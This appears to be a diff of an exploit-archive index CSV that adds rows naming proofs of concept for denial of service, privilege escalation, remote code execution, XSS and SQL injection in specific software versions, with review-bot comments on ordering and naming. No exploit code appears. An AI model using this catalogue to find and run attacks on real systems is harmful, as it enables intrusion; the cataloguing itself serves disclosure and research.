49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware, 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware,
49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple, 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware, 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware,
49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple, 49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",1970-01-01,"Dolev Farhi",dos,multiple, 49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",1970-01-01,"Dolev Farhi",dos,multiple,
49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",1970-01-01,"Dolev Farhi",dos,php,
49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,ios,
49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",dos,windows,
49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows, 49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows, 49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49979,exploits/ios/dos/49979.py,"n+otes 1.6.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows, 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows,
50247,exploits/windows/dos/50247.py,"Telegram Desktop 2.9.2 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",dos,windows,
50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)",1970-01-01,"Eric Salario",dos,windows, 50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)",1970-01-01,"Eric Salario",dos,windows,
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows, 50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows, 50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
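Review bot: the 49917 row spells the author `Brian Rodriguez` while the exploit file's header reads `Brian Rodríguez`, and the 49906 row titles the exploit RarmaRadio 2.72.8 while that file's `# Version:` header says 2.75.8; pick one spelling and one version for each so the index matches the files it points to.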
@ -11270,8 +11285,13 @@ id,file,description,date,author,type,platform,port
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",1970-01-01,1F98D,local,windows, 49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",1970-01-01,1F98D,local,windows,
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",1970-01-01,1F98D,local,java, 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",1970-01-01,1F98D,local,java,
49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",1970-01-01,rootabeta,local,windows, 49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",1970-01-01,rootabeta,local,windows,
50465,exploits/linux/local/50465.c,"Mini-XML 3.2 - Heap Overflow",1970-01-01,LIWEI,local,linux,
49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows, 49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows,
49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",1970-01-01,"Justin Steven",local,multiple, 49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",1970-01-01,"Justin Steven",local,multiple,
49514,exploits/solaris/local/49514.c,"Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)",1970-01-01,"Marco Ivaldi",local,solaris,
49515,exploits/solaris/local/49515.c,"Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)",1970-01-01,"Marco Ivaldi",local,solaris,
49516,exploits/solaris/local/49516.c,"Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",1970-01-01,"Marco Ivaldi",local,solaris,
49517,exploits/solaris/local/49517.c,"Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",1970-01-01,"Marco Ivaldi",local,solaris,
49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",1970-01-01,"West Shepherd",local,multiple, 49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",1970-01-01,"West Shepherd",local,multiple,
49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",1970-01-01,nu11secur1ty,local,multiple, 49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",1970-01-01,nu11secur1ty,local,multiple,
49526,exploits/multiple/local/49526.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution",1970-01-01,LiquidWorm,local,multiple, 49526,exploits/multiple/local/49526.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution",1970-01-01,LiquidWorm,local,multiple,
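Review bot: the 50465 Mini-XML row is inserted between 49409 and 49453, breaking the ascending-id order the rest of the file keeps (the Solaris rows 49514 to 49517 added in this same hunk are placed correctly between 49491 and 49521); move it to its numeric position.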
@ -11315,6 +11335,7 @@ id,file,description,date,author,type,platform,port
49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",1970-01-01,"Alan Mondragon",local,windows, 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",1970-01-01,"Alan Mondragon",local,windows,
49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows, 49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows,
49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",1970-01-01,"George Tsimpidas",local,windows, 49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",1970-01-01,"George Tsimpidas",local,windows,
49765,exploits/linux/local/49765.txt,"MariaDB 10.2 - 'wsrep_provider' OS Command Execution",1970-01-01,"Central InfoSec",local,linux,
49841,exploits/windows/local/49841.txt,"Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows, 49841,exploits/windows/local/49841.txt,"Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows,
49842,exploits/windows/local/49842.txt,"Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49842,exploits/windows/local/49842.txt,"Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49845,exploits/windows/local/49845.txt,"WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49845,exploits/windows/local/49845.txt,"WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
@ -11323,12 +11344,15 @@ id,file,description,date,author,type,platform,port
49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",1970-01-01,1F98D,local,windows, 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",1970-01-01,1F98D,local,windows,
49863,exploits/windows_x86-64/local/49863.js,"Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free",1970-01-01,"Forrest Orr",local,windows_x86-64,
49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows_x86-64, 49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows_x86-64,
49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",1970-01-01,SlidingWindow,local,windows, 49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",1970-01-01,SlidingWindow,local,windows,
49882,exploits/windows/local/49882.ps1,"Visual Studio Code 1.47.1 - Denial of Service (PoC)",1970-01-01,"H.H.A.Ravindu Priyankara",local,windows,
49888,exploits/windows/local/49888.txt,"ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path",1970-01-01,"Alejandra Sánchez",local,windows, 49888,exploits/windows/local/49888.txt,"ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path",1970-01-01,"Alejandra Sánchez",local,windows,
49889,exploits/windows/local/49889.txt,"Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows, 49889,exploits/windows/local/49889.txt,"Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows,
49890,exploits/windows/local/49890.txt,"Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows, 49890,exploits/windows/local/49890.txt,"Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows,
49892,exploits/windows/local/49892.py,"Mozilla Firefox 88.0.1 - File Extension Execution of Arbitrary Code",1970-01-01,"BestEffort Team",local,windows, 49892,exploits/windows/local/49892.py,"Mozilla Firefox 88.0.1 - File Extension Execution of Arbitrary Code",1970-01-01,"BestEffort Team",local,windows,
49893,exploits/windows/local/49893.c++,"DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)",1970-01-01,"Paolo Stagno",local,windows,
49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows, 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows,
49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",1970-01-01,"Víctor García",local,windows, 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",1970-01-01,"Víctor García",local,windows,
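Review bot: the added 49893 row points at `exploits/windows/local/49893.c++`; `.c++` is not the extension the other native-code rows in this file use (`49522.c`, `49754.c`), so confirm the file on disk really carries that name, otherwise the path in the index will not resolve. The other two additions in this hunk (49863 as `.js`, 49882 as `.ps1`) are consistent with their descriptions and platform columns.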
@ -11362,6 +11386,7 @@ id,file,description,date,author,type,platform,port
50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",1970-01-01,"Andrea Intilangelo",local,windows, 50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",1970-01-01,"Andrea Intilangelo",local,windows,
50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",1970-01-01,"Vishwaraj Bhattrai",local,android, 50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",1970-01-01,"Vishwaraj Bhattrai",local,android,
50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows, 50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows,
50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux,
50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
@ -11372,6 +11397,7 @@ id,file,description,date,author,type,platform,port
50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows, 50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows, 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux, 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
50401,exploits/windows/local/50401.txt,"Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, 50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, 50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50443,exploits/windows/local/50443.txt,"Netgear Genie 2.4.64 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, 50443,exploits/windows/local/50443.txt,"Netgear Genie 2.4.64 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
@ -18504,6 +18530,7 @@ id,file,description,date,author,type,platform,port
49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux, 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux,
49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",1970-01-01,HerculesRD,remote,unix, 49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",1970-01-01,HerculesRD,remote,unix,
49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",1970-01-01,BenChaliah,remote,hardware, 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",1970-01-01,BenChaliah,remote,hardware,
49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload (2)",1970-01-01,liewehacksie,remote,linux,
49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris, 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris,
49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux, 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux,
49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware, 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware,
@ -26055,12 +26082,14 @@ id,file,description,date,author,type,platform,port
49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",1970-01-01,"Aitor Herrero",webapps,php, 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",1970-01-01,"Aitor Herrero",webapps,php,
49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",1970-01-01,"Aitor Herrero",webapps,php, 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",1970-01-01,"Aitor Herrero",webapps,php,
49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",1970-01-01,"Talat Mehmood",webapps,php, 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",1970-01-01,"Talat Mehmood",webapps,php,
50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,multiple,
49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",1970-01-01,"Rob McCarthy",webapps,multiple, 49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",1970-01-01,"Rob McCarthy",webapps,multiple,
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",1970-01-01,omurugur,webapps,multiple, 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",1970-01-01,omurugur,webapps,multiple,
49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",1970-01-01,"Richard Jones",webapps,php, 49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",1970-01-01,"Richard Jones",webapps,php,
50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",1970-01-01,"Anubhav Singh",webapps,php, 50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",1970-01-01,"Anubhav Singh",webapps,php,
49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php, 49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php,
49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",1970-01-01,"Siva Rajendran",webapps,php, 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",1970-01-01,"Siva Rajendran",webapps,php,
49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)",1970-01-01,AkkuS,webapps,multiple, 49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,80 40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,80
30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",1970-01-01,"Ory Segal",webapps,php, 30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",1970-01-01,"Ory Segal",webapps,php,
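Review bot: the added 50463 row (WebCTRL OEM 6.5) is inserted between 49441 and 49443, well out of id sequence, and the unchanged 50461 row between 49445 and 49447 shows the same drift; if the file is meant to stay ordered by id (the hunk's own context already slips from 49447 to 49433, 40091 and 30170), both 504xx rows belong with the newest entries at the end rather than in this region. The added 49434 row is in sequence and matches the format of the neighbouring rows.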
@ -43323,6 +43352,7 @@ id,file,description,date,author,type,platform,port
48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",1970-01-01,"Dylan Garnaud",webapps,java, 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",1970-01-01,"Dylan Garnaud",webapps,java,
48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",1970-01-01,Besim,webapps,php, 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",1970-01-01,Besim,webapps,php,
48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",1970-01-01,"Anthony Cole",webapps,java, 48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",1970-01-01,"Anthony Cole",webapps,java,
49574,exploits/php/webapps/49574.txt,"PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting",1970-01-01,"Anmol K Sachan",webapps,php,
49575,exploits/php/webapps/49575.txt,"Comment System 1.0 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Pintu Solanki",webapps,php, 49575,exploits/php/webapps/49575.txt,"Comment System 1.0 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Pintu Solanki",webapps,php,
49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass",1970-01-01,"Suresh Kumar",webapps,php, 49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass",1970-01-01,"Suresh Kumar",webapps,php,
49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Kamil Breński",webapps,multiple, 49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Kamil Breński",webapps,multiple,
@ -43732,6 +43762,7 @@ id,file,description,date,author,type,platform,port
49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,Synacktiv,webapps,hardware, 49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,Synacktiv,webapps,hardware,
